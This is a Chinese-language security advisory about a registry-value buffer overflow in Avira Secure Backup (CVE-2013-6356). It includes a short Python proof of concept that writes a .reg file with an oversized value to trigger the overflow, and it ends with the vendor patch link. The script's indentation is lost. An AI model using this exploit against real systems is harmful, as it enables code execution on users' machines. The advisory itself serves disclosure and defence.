Avira Secure Backup本地缓冲区溢出漏洞
信息来源:Julien Ahrens 发表日期:2013-07-01 11:46:00
Avira Secure Backup是在线存储解决方案。
Avira Secure Backup 1.0.0.2.3630及其他版本在启动时从"HKEY_CURRENT_USER\\Software\\Avira Secure Backup"加载注册表值"AutoUpdateDownloadFilename"及"AutoUpdateProgressFilename",但没有进行有效的边界检查,在实现上存在缓冲区溢出漏洞,攻击者可利用此漏洞在受影响应用上下文中执行任意代码。
BUGTRAQ-ID:63765
CVE-ID:2013-6356
受影响系统:
AVIRA Secure Backup 1.0.0.2.3630
测试方法:
警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!#!/usr/bin/python
file="poc.reg"
junk1="\\xCC" * 1240
poc="Windows Registry Editor Version 5.00\\n\\n"
poc=poc + "[HKEY_CURRENT_USER\\Software\\Avira Secure Backup]\\n"
poc=poc + "\\"AutoUpdateProgressFilename\\"=\\"" + junk1 + "\\""
try:
print "[*] Creating exploit file...\\n";
writeFile = open (file, "w")
writeFile.write( poc )
writeFile.close()
print "[*] File successfully created!";
except:
print "[!] Error while creating file!";
解决办法:
厂商补丁:
AVIRA
-----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.avira.com/en/secure-backup-email-v1
参考信息:
http://www.securityfocus.com/archive/1/529854